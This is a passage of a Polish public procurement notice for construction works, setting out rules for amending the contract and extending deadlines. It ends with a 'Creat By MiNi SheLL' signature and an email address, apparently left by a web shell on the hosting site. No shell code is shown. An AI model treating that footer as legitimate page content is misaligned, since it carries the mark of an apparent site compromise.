wykonawcę, któremu zamawiający udzielił zamówienia, ma zastąpićnowy wykonawca: a) na podstawie postanowień umownych, o których mowa w pkt 1, b) w wynikupołączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowegowykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu,nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmianumowy, c) w wyniku przejęcia przez zamawiającego zobowiązań wykonawcy względem jegopodwykonawców; 5) zmiany, niezależnie od ich wartości, nie są istotne w rozumieniu ust. 1e; 6) łącznawartość zmian jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8ustawy Pzp i wartości zamówienia określonej pierwotnie w umowie w przypadku zamówień na robotybudowlane - jest mniejsza od 15% wartości zamówienia określonej pierwotnie w umowie. 1a. Wprzypadkach, o których mowa w ust. 1 pkt 2 i 3 oraz pkt 4 lit. b, zamawiający nie może wprowadzaćkolejnych zmian umowy w celu uniknięcia stosowania przepisów ustawy. 1b. W przypadkach, o którychmowa w ust. 1 pkt 1, 3 i 6, zmiany postanowień umownych nie mogą prowadzić do zmiany charakteruumowy. 1c. W przypadkach, o których mowa w ust. 1 pkt 2 i 3, zamawiający, po dokonaniu zmianyumowy, zamieszcza w Biuletynie Zamówień Publicznych lub przekazuje Urzędowi Publikacji UniiEuropejskiej ogłoszenie o zmianie umowy. 1d. Jeżeli umowa zawiera postanowienia przewidującemożliwość zmiany wynagrodzenia należnego wykonawcy z powodu okoliczności innych niż zmianazakresu świadczenia wykonawcy, dopuszczalną wartość zmiany umowy, o której mowa w ust. 1 pkt 2 lit.c, pkt 3 lit. b i pkt 6, ustala się w oparciu o wartość zamówienia określoną pierwotnie, z uwzględnieniemzmian wynikających z tych postanowień. 1e. Zmianę postanowień zawartych w umowie lub umowieramowej uznaje się za istotną, jeżeli: 1) zmienia ogólny charakter umowy, w stosunku do charakteruumowy w pierwotnym brzmieniu; 2) nie zmienia ogólnego charakteru umowy i zachodzi co najmniejjedna z następujących okoliczności: a) zmiana wprowadza warunki, które, gdyby były postawione wpostępowaniu o udzielenie zamówienia, to w tym postępowaniu wzięliby lub mogliby wziąć udział inniwykonawcy lub przyjęto by oferty innej treści, b) zmiana narusza równowagę ekonomiczną umowy lubumowy ramowej na korzyść wykonawcy w sposób nieprzewidziany pierwotnie w umowie lub umowieramowej, c) zmiana znacznie rozszerza lub zmniejsza zakres świadczeń i zobowiązań wynikający zumowy lub umowy ramowej, d) polega na zastąpieniu wykonawcy, któremu zamawiający udzieliłzamówienia, nowym wykonawcą, w przypadkach innych niż wymienione w ust. 1 pkt 4. 2.Postanowienie umowne zmienione z naruszeniem ust. 1-1b, 1d i 1e podlega unieważnieniu. Na miejsceunieważnionych postanowień umowy wchodzą postanowienia umowne w pierwotnym brzmieniu. 3.Strony dopuszczają również możliwość zmian umowy w następujących przypadkach: 3.1 Zmiana Stronumowy. 3.2. Zmiana kierownika budowy, osób nadzorujących roboty budowlane, osób wskazanych dorealizacji umowy, z zastrzeżeniem § 9 ust.6 pkt.4 wzoru umowy na podstawie informacji przekazanejprzez Strony bez konieczności aneksowania umowy. 3.3 Zmiana banków lub numerów kont bankowychStron na podstawie informacji przekazanej przez Strony bez konieczności aneksowania umowy. 3.4Zmiana stawek podatku VAT. W takim przypadku wynagrodzenie netto przysługujące Wykonawcypozostanie bez zmian a podatek VAT zostanie dostosowany do obowiązujących przepisów; 3.5. Zmianalub wprowadzenie podwykonawców na warunkach określonych w SIWZ. 4. Zmiana wynagrodzenia niewymaga zmiany umowy w formie aneksu w przypadku ograniczenia lub zwiększenia zakresu robót napodstawie obmiarów powykonawczych, z zastrzeżeniem ust. 1 pkt 6). 5. Zmiana w zakresie zmianyterminu: 5.1. wystąpienia robót dodatkowych, od wykonania których uzależnione jest wykonaniezamówienia podstawowego. W takim przypadku termin realizacji zostanie wydłużony o czas niezbędnyna wykonanie robót dodatkowych. 5.2. wystąpienie siły wyższej rozumianej jako wystąpienie zdarzenianadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało sięuniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonaniejego zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony Umowy zobowiązane sądołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoichzobowiązań umownych, powstałego na skutek działania siły wyższej. W takim przypadku terminrealizacji zostanie wydłużony o czas trwania siły wyższej . 5.3. wystąpienie warunków atmosferycznychuniemożliwiających prowadzenie robót budowlanych zgodnie z technologią ich wykonania, określoną wdokumentacji technicznej, specyfikacji technicznej wykonania i odbioru robót, w kartachtechnologicznych produktów i polskich normach. W przypadku wystąpienia tego typu warunkówatmosferycznych, termin realizacji umowy zostanie wydłużony o czas wstrzymania robót do momentuustania przyczyn ich wstrzymania. 5.4. zaistnienie odmiennych od przyjętych w dokumentacji warunkówgeologicznych kategoria gruntu, kurzawka, skała, niekontrolowane nasypy, obecność płyt betonowychitp.) skutkujące niemożliwością realizowania przedmiotu umowy przy dotychczasowych założeniachtechnologicznych. W przypadku wystąpienia tego typu odstępstw od założonych termin realizacji umowyzostanie wydłużony o czas w jakim zostały zaktualizowane warunki geologiczne poprzezprzeprowadzenie dodatkowych badań. 5.5. zaistnienia odmiennych od przyjętych w dokumentacjiprojektowej warunków terenowych, w szczególności napotkania innych nie zinwentaryzowanych sieci,urządzeń podziemnych kolidujących z realizowanymi robotami, skutkujących niemożliwościąprowadzenia robót. W przypadku wystąpienia tego typu odstępstw od założonych, termin realizacjiumowy zostanie wydłużony o czas uzyskania niezbędnych uzgodnień, zaprojektowania niezbędnychzabezpieczeń sieci oraz dokonania przełożenia kolidującego uzbrojenia. 5.6. protestów mieszkańców lubinnych osób prawnych i fizycznych. W tym przypadku termin realizacji zadania zostanie wydłużony doczasu uzyskania ostatecznej decyzji rozstrzygającej protest. 5.7. konieczność wykonania robótzamiennych o pracochłonności większej od robót pierwotnie przewidzianych do wykonania. Terminzostanie wydłużony o czas niezbędny na wykonanie tych robót. 5.8. pojawienia się na terenie budowyzewnętrznego inwestora prowadzącego roboty budowlane kolidujące, utrudniające bądź uniemożliwiająceprowadzenie prac budowlanych objętych zawartą umową. Termin zostanie wydłużony o czas niezbędnyna dokonanie uzgodnień i podpisanie porozumień umożliwiających realizację umowy. 5.9.opóźnień wprzyłączeniu do sieci zewnętrznych przez gestorów mediów, powstałych z przyczyn nie leżących postronie Wykonawcy. Termin zostanie wydłużony o czas niezbędny na wykonanie przyłączy. 5.10.opóźnień w uzyskaniu niezbędnych pozwoleń, zezwoleń, opinii niezbędnych do wykonania przedmiotuumowy powstałych z przyczyn nie leżących po stronie Wykonawcy. Termin zostanie wydłużony o czas,który był faktycznie niezbędny do uzyskania w/w dokumentów. 5.11. wstrzymania robót przezuprawnione organy/zamawiającego, z przyczyn nie wynikających z winy Stron umowy. Termin zostaniewydłużony o czas wstrzymania robót. 5.12. w wyniku przedłużającej się procedury udzieleniazamówienia oraz postępowań odwoławczych, wykonanie zamówienia w terminie określonym pierwotnieprzez zamawiającego w specyfikacji staje się niemożliwe. W takim przypadku termin określonypierwotnie zostanie wydłużony o czas trwania przedłużenia procedury. 6. Wszelkie zmiany do niniejszejumowy mogą być dokonane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności, zawyjątkiem rozdz. III ust. 6 pkt. 4) oraz rozdz. XXV ust . 3 pkt. 3.2 , 3.3 i 4 powyżej. 7. Stronawystępująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania zaistnieniaokoliczności, o których mowa w niniejszym paragrafie. Wniosek składany przez Wykonawcę o zmianępostanowień zawartej umowy musi być wyrażony na piśmie. </span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-06-28</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres"> 30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com